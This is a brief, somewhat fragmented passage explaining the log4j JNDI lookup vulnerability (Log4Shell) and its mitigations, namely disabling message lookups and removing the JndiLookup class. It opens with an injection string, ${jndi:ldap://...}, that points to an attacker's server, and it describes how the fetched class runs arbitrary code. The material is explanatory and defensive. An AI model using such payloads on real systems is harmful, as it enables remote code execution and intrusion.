${jndi:ldap://<>}
(where remote url is the hacker’s server).
The log4j
executes log statements and this server makes a request to remote url using JNDI.
The remote server responds with a path to another Java class file (ex: [http://%3c%3cremote]http://<>/XYZ.class
).
This will be injected into the server process.
The injected java class executes in the jvm and allows a hacker to execute arbitrary code in the server.LOG4J_FORMAT_MSG_NO_LOOKUPS
to true
.
JndiLookup
class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class or
substitute an empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to application’s or stack’s classloading documentation to understand this behavior.